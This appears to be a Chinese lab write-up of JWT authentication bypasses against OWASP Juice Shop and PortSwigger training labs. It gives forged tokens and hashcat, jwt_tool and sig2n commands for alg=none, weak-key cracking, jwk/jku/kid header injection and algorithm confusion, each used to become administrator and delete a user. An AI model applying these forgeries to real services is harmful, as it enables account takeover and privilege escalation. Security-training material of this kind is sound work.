Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoiIiwiZW1haWwiOiIxMjNAcXEuY29tIiwicGFzc3dvcmQiOiJlMTBhZGMzOTQ5YmE1OWFiYmU1NmUwNTdmMjBmODgzZSIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiJ1bmRlZmluZWQiLCJwcm9maWxlSW1hZ2UiOiIvYXNzZXRzL3B1YmxpYy9pbWFnZXMvdXBsb2Fkcy9kZWZhdWx0LnN2ZyIsInRvdHBTZWNyZXQiOiIiLCJpc0FjdGl2ZSI6dHJ1ZSwiY3JlYXRlZEF0IjoiMjAyMi0xMS0xNiAwNTozOTo0NS43MDcgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAyMi0xMS0xNiAwNTo0NDowNC41MjMgKzAwOjAwIiwiZGVsZXRlZEF0IjpudWxsfSwiaWF0IjoxNjY4NTc3NDU3LCJleHAiOjE2Njg1OTU0NTd9.DXYw24kJYuBcHxuWHEocNupJzjocpCWAoZPByvaJgcZ5K2CXUXYpBYdHCy7L6DZD_Od9Xh7DNJUdfP__6gwLVQ9LJ7k98af3cLBhQ_M7TW2TtoXOOcZzkVnVuN0QW1w7bTK4venFwSeWDuOshpF_fFWGlxd42y4kOS2as2cb5xo
Connection: close
Referer: http://192.168.111.128/
Cookie: language=zh_CN; welcomebanner_status=dismiss; cookieconsent_status=dismiss; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoiIiwiZW1haWwiOiIxMjNAcXEuY29tIiwicGFzc3dvcmQiOiJlMTBhZGMzOTQ5YmE1OWFiYmU1NmUwNTdmMjBmODgzZSIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiJ1bmRlZmluZWQiLCJwcm9maWxlSW1hZ2UiOiIvYXNzZXRzL3B1YmxpYy9pbWFnZXMvdXBsb2Fkcy9kZWZhdWx0LnN2ZyIsInRvdHBTZWNyZXQiOiIiLCJpc0FjdGl2ZSI6dHJ1ZSwiY3JlYXRlZEF0IjoiMjAyMi0xMS0xNiAwNTozOTo0NS43MDcgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAyMi0xMS0xNiAwNTo0NDowNC41MjMgKzAwOjAwIiwiZGVsZXRlZEF0IjpudWxsfSwiaWF0IjoxNjY4NTc3NDU3LCJleHAiOjE2Njg1OTU0NTd9.DXYw24kJYuBcHxuWHEocNupJzjocpCWAoZPByvaJgcZ5K2CXUXYpBYdHCy7L6DZD_Od9Xh7DNJUdfP__6gwLVQ9LJ7k98af3cLBhQ_M7TW2TtoXOOcZzkVnVuN0QW1w7bTK4venFwSeWDuOshpF_fFWGlxd42y4kOS2as2cb5xo
If-None-Match: W/"b-/5bSboVjVhGw3qRgvUfZjE1r1Ns"


2. 发现网站邮箱格式

浏览网页,发现网站使用的邮箱格式:@juice-sh.op
在这里插入图片描述

3. 修改 JWT

请求头Authorization的值为:

Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjEsInVzZXJuYW1lIjoiIiwiZW1haWwiOiIxMjNAcXEuY29tIiwicGFzc3dvcmQiOiJlMTBhZGMzOTQ5YmE1OWFiYmU1NmUwNTdmMjBmODgzZSIsInJvbGUiOiJjdXN0b21lciIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiJ1bmRlZmluZWQiLCJwcm9maWxlSW1hZ2UiOiIvYXNzZXRzL3B1YmxpYy9pbWFnZXMvdXBsb2Fkcy9kZWZhdWx0LnN2ZyIsInRvdHBTZWNyZXQiOiIiLCJpc0FjdGl2ZSI6dHJ1ZSwiY3JlYXRlZEF0IjoiMjAyMi0xMS0xNiAwNTozOTo0NS43MDcgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAyMi0xMS0xNiAwNTo0NDowNC41MjMgKzAwOjAwIiwiZGVsZXRlZEF0IjpudWxsfSwiaWF0IjoxNjY4NTc3NDU3LCJleHAiOjE2Njg1OTU0NTd9.DXYw24kJYuBcHxuWHEocNupJzjocpCWAoZPByvaJgcZ5K2CXUXYpBYdHCy7L6DZD_Od9Xh7DNJUdfP__6gwLVQ9LJ7k98af3cLBhQ_M7TW2TtoXOOcZzkVnVuN0QW1w7bTK4venFwSeWDuOshpF_fFWGlxd42y4kOS2as2cb5xo

来到专业网站分析如下:https://jwt.io/
根据多年口算MD5的经验得知,密码的加密方式是MD5
在这里插入图片描述

接下来篡改 JWT 的内容(不要base64编码结果最后面的等号!)
修改得到JWT第一部分:ewogICJ0eXAiOiAiSldUIiwKICAiYWxnIjogIk5vbmUiCn0
在这里插入图片描述

修改得到JWT第二部分:

ewogICJzdGF0dXMiOiAic3VjY2VzcyIsCiAgImRhdGEiOiB7CiAgICAiaWQiOiAxLAogICAgInVzZXJuYW1lIjogIiIsCiAgICAiZW1haWwiOiAiYWRtaW5AanVpY2Utc2gub3AiLAogICAgInBhc3N3b3JkIjogImUxMGFkYzM5NDliYTU5YWJiZTU2ZTA1N2YyMGY4ODNlIiwKICAgICJyb2xlIjogImN1c3RvbWVyIiwKICAgICJkZWx1eGVUb2tlbiI6ICIiLAogICAgImxhc3RMb2dpbklwIjogInVuZGVmaW5lZCIsCiAgICAicHJvZmlsZUltYWdlIjogIi9hc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwKICAgICJ0b3RwU2VjcmV0IjogIiIsCiAgICAiaXNBY3RpdmUiOiB0cnVlLAogICAgImNyZWF0ZWRBdCI6ICIyMDIyLTExLTE2IDA1OjM5OjQ1LjcwNyArMDA6MDAiLAogICAgInVwZGF0ZWRBdCI6ICIyMDIyLTExLTE2IDA1OjQ0OjA0LjUyMyArMDA6MDAiLAogICAgImRlbGV0ZWRBdCI6IG51bGwKICB9LAogICJpYXQiOiAxNjY4NTc3NDU3LAogICJleHAiOiAxNjY4NTk1NDU3Cn0

在这里插入图片描述

由于加密方式为空,因此第三部分为空,于是得到篡改后的JWT如下:

ewogICJ0eXAiOiAiSldUIiwKICAiYWxnIjogIk5vbmUiCn0.ewogICJzdGF0dXMiOiAic3VjY2VzcyIsCiAgImRhdGEiOiB7CiAgICAiaWQiOiAxLAogICAgInVzZXJuYW1lIjogIiIsCiAgICAiZW1haWwiOiAiYWRtaW5AanVpY2Utc2gub3AiLAogICAgInBhc3N3b3JkIjogImUxMGFkYzM5NDliYTU5YWJiZTU2ZTA1N2YyMGY4ODNlIiwKICAgICJyb2xlIjogImN1c3RvbWVyIiwKICAgICJkZWx1eGVUb2tlbiI6ICIiLAogICAgImxhc3RMb2dpbklwIjogInVuZGVmaW5lZCIsCiAgICAicHJvZmlsZUltYWdlIjogIi9hc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwKICAgICJ0b3RwU2VjcmV0IjogIiIsCiAgICAiaXNBY3RpdmUiOiB0cnVlLAogICAgImNyZWF0ZWRBdCI6ICIyMDIyLTExLTE2IDA1OjM5OjQ1LjcwNyArMDA6MDAiLAogICAgInVwZGF0ZWRBdCI6ICIyMDIyLTExLTE2IDA1OjQ0OjA0LjUyMyArMDA6MDAiLAogICAgImRlbGV0ZWRBdCI6IG51bGwKICB9LAogICJpYXQiOiAxNjY4NTc3NDU3LAogICJleHAiOiAxNjY4NTk1NDU3Cn0.

4. 验证是否存在漏洞

重放自己注册账号的流量包:
在这里插入图片描述

篡改 JWT,同时修改AuthorizationCookietoken值。从结果来看,存在漏洞。
在这里插入图片描述

5. 漏洞利用

修改自己账号的密码,抓包发现,与我当前账户身份相关的只有AuthorizationCookietoken值,并没有邮箱、用户名之类的东西。那就直接篡改
在这里插入图片描述

看起来是篡改成功了
在这里插入图片描述

登录一下,果然登录成功
在这里插入图片描述

案例2:BurpSuite

BurpSuite提供了专业的靶场:https://portswigger.net/web-security/all-labs#jwt
开启靶场如果失败,请关闭代理!

案例2.1:接受任意签名

漏洞靶场:通过未验证签名绕过 JWT 身份验证(JWT authentication bypass via unverified signature
本实验使用基于 JWT 的机制来处理会话。由于实施缺陷,服务器不会验证它收到的任何 JWT 的签名。
在这里插入图片描述

1. 登录靶场

根据提示信息,使用账号密码登录靶场:wiener:peter
在这里插入图片描述

根据第2条提示信息,转到Proxy > HTTP history选项卡并查看登录后GET /my-account请求。发现cookie中内容貌似是 JWT 格式的。注意到 :

  1. HaE 插件高亮显示这似乎是 JWT
  2. 手工选中一段JWT内容,bp自动base64解码出一段JSON格式的数据

在这里插入图片描述

2. 查看JWT内容

插件“JWT Editor”和在线网站https://jwt.io/的查看结果如下图

eyJraWQiOiI1YzFmNmFmYy1kOWY2LTQwZjktOGNjYi03Yjc2ZGQwZjZkNGIiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY2ODU5MTU4NH0.fZccU7P-LykenK53PonHM4pY_R4zqRJfzVDVkIlj3qSvd0VZNRbitFvq5ep6QH3FKRR7UqkCUVpWkDd0jEb8zKJIh_mWVH9HZA1nM3dXHXIhaiI3aj3TF7RHQhexPW4mG9AqNY2Xeo29nNSYFKViGGIbHkpuWqEyewGqUyiMP4OcnuJCEVzro7vKjqprQhyK7FpDTzu2mM_zOrmpMArWKWJWxtQeqZPkZ_7Y5JLQ2l6VVSwOPLIEuiF9GMa5nag0H0xa9tewOZ38_pDqfFVxgRYKC5VKF6JfeSHUZ8D3GNDJIF3Rg-__I_H1uFlEakoa2zIww0ovCuWTFpMRj8UmxQ

在这里插入图片描述

在这里插入图片描述

3. 篡改 JWT

根据第4条提示信息,访问/admin页面,我需要篡改身份为:administrator
又由于此靶场是接受任意签名的,因此无需关心签名是否正确!
在这里插入图片描述

然后删除账户,完成靶场目标
在这里插入图片描述

由于删除账户的时候,还得不停的修改数据包中的 JWT,很烦人,所以我直接修改浏览器存储的Cookie,进而一步到位。
在这里插入图片描述

案例2.2:接受未签名的令牌

漏洞靶场:通过有缺陷的签名验证绕过 JWT 身份验证(Lab: JWT authentication bypass via flawed signature verification)
在这里插入图片描述

1. 登录靶场

根据提示信息,使用账号密码登录靶场:wiener:peter。根据靶场的第2条提示信息,在/my-account页面中发现了JWT类型的Cookie。当然,也可以通过HaE插件发现。看到数据是以eyJ开头的,得知是JWT。
在这里插入图片描述

2. 验证漏洞

首先把流量转发到重放模块,签名设为空,身份修改为administrator
在这里插入图片描述

修改好,来到“RAW”页面,搜索. ,从搜索结果中得知经插件“JWT Editor”生成的JWT有两个.,因此需要手动删除JWT第二个.之后的内容
在这里插入图片描述

发送数据包,发现已经越权,存在JWT漏洞
在这里插入图片描述

3. 漏洞利用

根据靶场目标得知,要删除用户carlos。
首先篡改cookie,刷新浏览器之后,看到自己是administrator,然后就是删除用户,完成目标。
在这里插入图片描述

案例2.3:暴力破解密钥

漏洞靶场:通过有缺陷的签名验证绕过 JWT 身份验证(Lab: JWT authentication bypass via weak signing key)
靶场的目标同上,使用wiener:peter登录系统,然后越权,最后删除账号carlos就算打靶通过

1. 登录靶场

登录靶场,发现“未签名令牌”的利用方式不好用了,页面要跳转到登录页面去。那就需要尝试爆破密钥了
在这里插入图片描述

2. 爆破密钥

按照靶机“解决方案”中的“第一部分”的操作,得到密钥是:secret1

方式1:jwtcrack

绝望,破解了一个半小时,也没破解出来。
在这里插入图片描述

方式2:hashcat

.\hashcat.exe -a 0 -m 16500 eyJraWQiOiI0ZjIyYWI0Zi0yMjM0LTRhZGItOTMxNC1kN2FlOWM2ZGI2ZTIiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY2ODc2NTg5Nn0.qoqNn749sftmFnsmBO3GoGOUXk4oeTRs770lbpwDEIA C:\Users\asuka\Desktop\jwt.secrets.list

在这里插入图片描述

方式3:jwt_tool

python ./jwt_tool.py eyJraWQiOiI0ZjIyYWI0Zi0yMjM0LTRhZGItOTMxNC1kN2FlOWM2ZGI2ZTIiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY2ODc2NTg5Nn0.qoqNn749sftmFnsmBO3GoGOUXk4oeTRs770lbpwDEIA -C -d /usr/share/SecLists-2022.2/Passwords/Common-Credentials/10k-most-common.txt

在这里插入图片描述

3. 重新签名

方法1:使用BP插件JWT Editor

参见:https://www.youtube.com/watch?v=Wu6UR-Myiy0

按照靶机“解决方案”中的“第二部分”的操作:

  1. 对密钥进行base64编码
  2. 在 Burp 中,转到“JWT Editor Keys”选项卡并单击“New Symmetric Key”。在对话框中,单击生成以生成 JWK 格式的新密钥。把“k”的值修改为base64编码后的密钥值。
  3. 保存密钥

在这里插入图片描述

添加完成后,如下图所示
在这里插入图片描述

按照靶机“解决方案”中的“第三部分”的操作:修改并签署 JWT

  1. 在有效负载中,将sub声明的值更改为administrator
  2. 在选项卡底部,单击Sign,然后选择刚刚生成的密钥
  3. 选中“Don’t modify header”选项,然后单击OK。现在已使用正确的签名对修改后的令牌进行签名。

在这里插入图片描述

发送数据包,确认存在漏洞
在这里插入图片描述

方法2:使用BP插件JSON Web Tokens

参见:https://www.youtube.com/watch?v=xTrusprPJyg

如图所示,我并没有开启插件HaE,但是HTTP历史记录中出现了蓝色高亮的内容,注释信息中提示此请求中包含JWT。
在这里插入图片描述

开始重新签名
在这里插入图片描述

签名后的结果,与JWT中的内容相符,但是发送数据包失败了,根据响应包内容得知请求包的第19行应该是多余的,删掉之后成功证明漏洞存在
在这里插入图片描述

在这里插入图片描述

方法3:使用 jwt.io

填写密钥后,可以直接篡改payload,实时生成对应的JWT。丢到bp里面替换掉之前的JWT内容就行了
在这里插入图片描述

方法4:使用jwt_tool

首先修改payload

python ./jwt_tool.py eyJraWQiOiIxNWEyYTdiZi04NjE3LTQ2YjctODNkOS1kNTA5MjFhNzMyZjMiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY2ODc4MDkzOH0.yhSQgn1LCb1D-_awijGySOeU--8rCbf2qtMvM-Vso2M -T

在这里插入图片描述

在这里插入图片描述

然后重新生成JWT,丢到bp中测试一下,漏洞验证成功

python ./jwt_tool.py eyJraWQiOiIxNWEyYTdiZi04NjE3LTQ2YjctODNkOS1kNTA5MjFhNzMyZjMiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2Njg3ODA5Mzh9.yhSQgn1LCb1D-_awijGySOeU--8rCbf2qtMvM-Vso2M -S hs256 -p "secret1"

在这里插入图片描述

4. 漏洞利用

来到浏览器中篡改cookie,越权为管理员,删掉某用户完成打靶。
在这里插入图片描述

案例2.4:jwk参数注入攻击

漏洞靶场:通过 jwk 标头注入绕过 JWT 身份验证(Lab: JWT authentication bypass via jwk header injection)
靶场的目标同上,使用wiener:peter登录系统,然后越权,最后删除账号carlos就算打靶通过
在这里插入图片描述

1. 登录靶场

在这里插入图片描述

此时的jwt结构如下:
在这里插入图片描述

2. 创建RSA密钥

在这里插入图片描述

3. 签名篡改后的JWT

  1. 篡改JWT

在负载中,将sub声明的值更改为administrator。

  1. 使用RSA私钥签名篡改后的JWT

在JSON Web Token选项卡的底部,单击Attack,然后选择Embedded JWK。出现提示时,选择您新生成的 RSA 密钥并单击确定。

  1. 验证漏洞

发送数据包之后发现,果然存在漏洞
在这里插入图片描述

在这里插入图片描述

篡改之后的JWT格式如下:
在这里插入图片描述

4. 漏洞利用

来到浏览器中篡改cookie,越权为管理员,删掉某用户完成打靶。
在这里插入图片描述

案例2.5:jku参数注入攻击

漏洞靶场:通过 jku 标头注入绕过 JWT 身份验证(Lab: JWT authentication bypass via jku header injection)
靶场的目标同上,使用wiener:peter登录系统,然后越权,最后删除账号carlos就算打靶通过
在这里插入图片描述

1. 登录靶场

在这里插入图片描述

在这里插入图片描述

此时的jwt结构如下:
在这里插入图片描述

2. 制作恶意jku

  1. 创建RSA密钥

在这里插入图片描述

  1. 根据提示,用一个空的 JWK Set替换Body部分的内容

在这里插入图片描述

  1. 返回JWT Editor Keys选项卡,右键单击您刚刚生成的密钥条目,然后选择Copy Public Key as JWK

在这里插入图片描述

  1. 将复制的结果粘贴到响应体中keys的中括号里面,点击“store”存储起来。然后修改一下文件路径,如:/.well-known/jwks.json,这个时候你就得到了恶意jku的路径。

在这里插入图片描述

3. 修改并签署 JWT

  1. 修改头部

kid(Key ID):提供一个ID,在有多个密钥可供选择的情况下,服务器可以使用该ID来识别正确的密钥。根据密钥的格式可能还有一个匹配的kid参数。

在 JWT 的头部中,将kid参数的当前值替换为kid您上传到漏洞利用服务器的 JWK 的值
在 JWT 的头部中,添加jku参数,将其值设置为您在漏洞利用服务器上的 JWK 集的 URL
注意要在alg后面跟一个,

  1. 篡改身份

在负载中,将sub声明的值更改为administrator

  1. 签名

在选项卡底部,单击Sign,然后选择您在上一节中生成的 RSA 密钥。
确保选中Don't modify header选项,然后单击OK。现在已使用正确的签名对修改后的令牌进行签名。
在这里插入图片描述

一旦发包,页面跳转到登录页面,经过多次尝试都是这样,没办法,查看了一下教程,发现他们是在别的页面做的攻击效果。
在这里插入图片描述

如下图,一旦登录账号,就会进入到自己的账号,cookie中就会有自己的身份,我打靶一直用的是这个浏览记录。但是这次,需要点击网页中的“My account”,通过这个浏览记录才可以打靶成功。
在这里插入图片描述

下面就可以顺利打靶了。修改好JWT之后,注意把请求地址中的身份篡改一下才行。
在这里插入图片描述

在这里插入图片描述

4. 漏洞利用

如果你把浏览器中的cookie篡改掉是没用的,一旦篡改,刷新浏览器就302跳转到登录页面。想要利用,需要通过bp。

  1. 根据靶场提示,来到/admin目录,搜素发现了删除carlos账户的链接地址

在这里插入图片描述

  1. 删除账号,通过浏览器显示得知打靶成功

在这里插入图片描述

案例2.6:kid参数注入攻击

漏洞靶场:通过 kid 标头路径遍历绕过 JWT 身份验证(Lab: JWT authentication bypass via kid header path traversal)
靶场的目标同上,使用wiener:peter登录系统,然后越权,最后删除账号carlos就算打靶通过
在这里插入图片描述

1. 登录靶场

在这里插入图片描述

2. 新建对称密钥

根据靶场提示信息:

  1. 新建对称密钥
  2. 在 Burp 中,转到“JWT Editor Keys”选项卡并单击“New Symmetric Key”。在对话框中,单击生成以生成 JWK 格式的新密钥。把“k”的值修改为base64编码后的密钥值。
  3. 将生成的k属性值替换为 Base64 编码后的空字节 AA==

在这里插入图片描述

3. 修改并签名 JWT

  1. 在JWT的header中,将kid参数的值改为/dev/null,为了保证成功,这里使用多个../../../../../../../../dev/null
  2. 篡改身份。
  3. 签名。确保选中Don't modify header选项,然后单击OK。现在使用空字节作为密钥对修改后的令牌进行签名。

在这里插入图片描述

从下图中可以看到,漏洞存在
在这里插入图片描述

4. 漏洞利用

来到浏览器中篡改cookie,越权为管理员,删掉某用户完成打靶。
在这里插入图片描述

案例2.7:算法混淆攻击

漏洞靶场:通过算法混淆绕过 JWT 身份验证(Lab: JWT authentication bypass via algorithm confusion)
靶场的目标同上,使用wiener:peter登录系统,然后越权,最后删除账号carlos就算打靶通过
在这里插入图片描述

1. 打开靶场

想要实现这种攻击的前提是必须拿到泄露的公钥。
根据靶场提示,在/jwks.json中找到了泄露的公钥。然后登录靶场。
在这里插入图片描述

2. 生成恶意签名密钥

  1. 在 Burp 中,转到Burp 主选项卡栏中的JWT Editor Keys选项卡。
  2. 单击新建New RSA Key
  3. 在对话框中,确保选中JWK选项,然后粘贴刚刚复制的 JWK。单击“确定”保存密钥。

在这里插入图片描述

  1. 右键单击您刚刚创建的密钥条目,然后选择Copy Public Key as PEM
  2. 使用“解码器”选项卡对此 PEM 密钥进行 Base64 编码,然后复制生成的字符串。

在这里插入图片描述

  1. 返回Burp 主选项卡栏中的JWT Editor Keys选项卡。
  2. 单击New Symmetric Key。在对话框中,单击生成以生成 JWK 格式的新密钥。请注意,您无需选择密钥大小,因为稍后会自动更新。
  3. 将为 k 属性生成的值替换为您刚刚创建的 Base64 编码 PEM。
  4. 保存密钥。

在这里插入图片描述

3. 修改并签署令牌

  1. 在 JWT 的标头中,将alg参数的值更改为HS256
  2. 在负载中,将sub声明的值更改为administrator。
  3. 在选项卡底部,单击Sign,然后选择您在上一节中生成的对称密钥。
  4. 确保选中Don't modify header选项,然后单击OK。现在使用服务器的公钥作为密钥对修改后的令牌进行签名。

在这里插入图片描述

成功验证漏洞
在这里插入图片描述

4. 漏洞利用

来到浏览器中篡改cookie,越权为管理员,删掉某用户完成打靶。
在这里插入图片描述

案例2.8:从现有令牌派生公钥

参考:https://www.youtube.com/watch?v=-GssKYJ5OYg

漏洞靶场:通过算法混淆绕过 JWT 身份验证,不暴露密钥(Lab: JWT authentication bypass via algorithm confusion with no exposed key)
靶场的目标同上,使用wiener:peter登录系统,然后越权,最后删除账号carlos就算打靶通过
在这里插入图片描述

1. 获取服务器生成的两个 JWT

登录靶机,然后退出账号。再登陆一次,再退出账号。于是就得到了2个JWT:
在这里插入图片描述

2. 暴力破解服务器的公钥

在终端中,运行以下命令,将两个 JWT 作为参数传递。请注意,第一次运行此程序时,从 Docker Hub 拉取映像可能需要几分钟时间:docker run --rm -it portswigger/sig2n <token1> <token2>

  1. 输出包含一个或多个计算值n,这些中的每一个在数学上都是可能的,但只有其中一个与服务器使用的值相匹配。在每种情况下,输出还提供以下内容:
    1. X.509 和 PKCS1 格式的 Base64 编码公钥。
    2. 使用这些密钥中的每一个签名的篡改 JWT。
  2. 从第一个 X.509 条目(您可能只有一个)复制被篡改的 JWT
    1. 如果您收到 200 响应并成功访问您的帐户页面,那么这是正确的 X.509 密钥
    2. 如果您收到 302 响应,将您重定向到/login并删除您的会话 cookie,那么这是错误的 X.509 密钥。在这种情况下,对脚本输出的每个 X.509 密钥使用篡改的 JWT 重复此步骤。

在这里插入图片描述

经过多次尝试,发现使用下图红框中的jwt能够返回200响应码,说明它是就是我们在找的那个JWT
在这里插入图片描述

3. 生成恶意签名密钥

  1. 找到正确的JWT上面那个base64编码的字符串
  2. 在 Burp 中,转到JWT Editor Keys选项卡并单击New Symmetric Key
  3. 在对话框中,单击“生成”以生成 JWK 格式的新密钥
  4. 将生成的k属性值替换为刚刚复制的 Base64 编码密钥,并保存

在这里插入图片描述

4. 修改并签署令牌

  1. 在 JWT 的标头中,确保alg参数设置为HS256
  2. 在 JWT 负载中,将sub声明的值更改为administrator
  3. 在选项卡底部,单击Sign,然后选择您在上一节中生成的对称密钥
  4. 确保选中Don't modify header选项,然后单击OK。现在使用服务器的公钥作为密钥对修改后的令牌进行签名。

在这里插入图片描述

5. 漏洞利用

来到浏览器中篡改cookie,越权为管理员,删掉某用户完成打靶。
在这里插入图片描述

参考

JWT 攻击(from burpsuite)
Working with JWTs in Burp Suite(from burpsuite)
Algorithm confusion attacks(算法混淆攻击)(from burpsuite)
一文读懂JWT,JWS,JWE(from zh_coder)
九维团队-红队(突破)| 从JWT-Lab靶场学习JWT的攻击方式(from 安恒信息安全服务)
安全运营内刊—检测与防护能力—浅析JWT攻击类型(from 天融信安全服务)
渗透测试-JWT攻击(from 成都知道创宇)
学习JWT,看这篇就够了!(from 酒仙桥六号部队)
JWT攻击手册(介绍了jwt_tool的一些用法)
Hacker Tools: JWT_Tool – The JSON Web Token Toolkit(from intigriti 介绍了jwt_tool的一些用法)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/142479.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

一个普通程序员,记录自己沪漂的2022年,2023年1月5日

或许对于每个人而言&#xff0c;2022年都是很艰难的&#xff0c;都是充满曲折的&#xff0c;仅仅以文字记录下我的2022年&#xff0c;我的沪漂生活。 今天是2023年1月5日&#xff0c;昨天的我做了一个梦&#xff0c;梦到自己捡到很多手机&#xff0c;于是做到工位的第一件事就…

(5)Qt中的日期和时间

QDate 日期对象格式化 d - 没有前导零的日子 (1 to 31) dd - 前导为0的日子 (01 to 31) ddd - 显示(缩写) 周一、周二、周三、周四、周五、周六、周日 dddd - 显示(完整) 星期一、星期二、…

微服务三个阶段

微服务三个阶段微服务三个阶段&#xff1a;微服务1.0&#xff1a;仅使用注册发现&#xff0c;基于Spring Cloud 或 Dubbo开发。微服务2.0&#xff1a;使用熔断、限流、降级等服务治理策略&#xff0c;并配备完整微服务工具和平台。微服务3.0&#xff1a;Service Mesh将服务治理…

https安全传输揭秘

HTTPS是什么 我们知道HTTP是明文传输的&#xff0c;恶意的中间人和窃听者通过截取用户发送的网络数据包可以拿到用户的敏感信息。尤其是涉及网上交易&#xff0c;银行转账等操作更是危害极大。 HTTPS的核心是SSL/TLS安全协议层&#xff0c;该层位于应用层和传输层之间&#x…

初识异常(Java系列10)

目录 前言&#xff1a; 1.异常的概念 2.异常的分类 2.1编译时异常 2.2运行时异常 3.异常的处理 3.1如何抛出异常 3.2异常的捕获 3.2.1异常的声明 3.2.2try-catch捕获并处理 3.3异常的处理流程 4.自定义异常类 结束语&#xff1a; 前言&#xff1a; 相信在大家学…

Windows常用命令整理

之前写了一篇关于Windows快速打开服务_陌客依天涯的博客-CSDN博客_服务快捷键 的文章&#xff0c;有表示windows还有很多常用的&#xff0c;那就整理一下&#xff0c;分享跟多点&#xff0c;希望对大家有用。 1、mstsc /*快速开启远程连接客户端*/ 2、regedit /*快速打开注册…

AcWing 1227.分巧克力(二分)

一、题目信息 二、思路分析 先从数据范围入手&#xff0c;这道题的数据范围最大是10的5次方&#xff0c;这就说明我们解决问题时的用到的算法的时间复杂度要控制在O(n)O(n)O(n)或者O(nlog(n))O(nlog(n))O(nlog(n))。 而O(nlog(n))O(nlog(n))O(nlog(n))的算法中最常用的是二分或…

基于RateLimiter+Aop+自定义注解实现QPS限流

QPS秒级限流一、Aop二、自定义注解三、测试类实例QPS简介&#xff1a;QPS&#xff08;Query Per Second&#xff09;&#xff0c;QPS 其实是衡量吞吐量&#xff08;Throughput&#xff09;的一个常用指标&#xff0c;就是说服务器在一秒的时间内处理了多少个请求 —— 我们通常…

控制流分析之构建支配树

控制流分析之构建支配树引言1 分析有向图2 构建支配树2.1 求最小半支配点2.2 求最近支配点引言 如上一个带有起始入口点的有向图为例&#xff0c;从A到Q的必经结点有A、L、M、Q&#xff0c;我们称其为Q的支配点&#xff0c;其中M为Q的最近支配点。我们将每个结点的最近支配结点…

分享124个PHP源码,总有一款适合您

PHP源码 分享124个PHP源码&#xff0c;总有一款适合您 源码下载 链接&#xff1a;https://pan.baidu.com/s/1AIktEQ0-cPRoSSAw_eA2Lw?pwdfb9m 提取码&#xff1a;fb9m 下面是文件的名字&#xff0c;我放了一些图片&#xff0c;文章里不是所有的图主要是放不下...&#xff0…

2022 Apache APISIX 年度记忆

时光已逝&#xff0c;转眼 2022 年已然落下了帷幕。Apache APISIX 社区在众多开源爱好者和开发者的陪伴下&#xff0c;又一起走过了新的四季。 在过去的一年中&#xff0c;我们的开源项目和社区都取得了许多成就&#xff0c;并得到了来自全球范围的广泛关注和支持。2022 年&am…

数据库管理与表文件管理

数据库管理&#xff1a; 1.MySql服务器管理数据库位置&#xff1a;C:\ProgramData\MySQL\MySQL Server 5.5\data 2.查看所有的数据库名 show databases; mysql> show databases;&#xff08;查看有哪些数据库 这属于MySql的命令&#xff0c;不属于SQL语句&…

硅基仿生业务全面 Serverless 容器化,14万+问答库助力糖尿病科普

作者&#xff1a;宁佑章&#xff08;硅基仿生科技&#xff09;、元毅&#xff08;阿里云容器服务&#xff09; “使用阿里云容器服务 Knative&#xff0c;解决了开发迭代慢的问题&#xff0c;加速了深度学习模型的性能提升&#xff1b;同时提供了弹性可伸缩的资源配置&#xf…

关于Linux宝塔面板nginx配置关于php项目的跨域请求

1、网上有好多跨域请求的案例。最多的如下&#xff1a; 在项目下的配置文件中添加&#xff1a; #add_header Access-Control-Allow-Origin * always; #add_header Access-Control-Allow-Credentials true; #add_header Access-Control-Allow-Methods GET,POST,OPTIONS…

新库上线 | CnOpenData中诚信绿金ESG评级数据

中诚信绿金ESG评级数据 一、数据简介 在碳达峰、碳中和的时代浪潮下&#xff0c;以环境、社会、公司治理为核心的ESG投资理念迅速成为发现资本市场投资机遇、规避投资风险的利器。中诚信绿金在多年信用评级经验的基础上通过建立契合国内政策趋势、信息披露现状、行业发展情况…

applicationContext讲解

applicationContext讲解 生成bean 豆子&#xff0c;bean工厂&#xff0c;对象的工厂 id是对象名&#xff0c;豆子的名字&#xff0c;全项目唯一&#xff0c;class是类全路径名 bean标签的底层实现是无参构造方法 <bean id"book1" class"com.nz.entity.Book&q…

【BFS 广度优先搜索】详解感染橘子最短时间问题

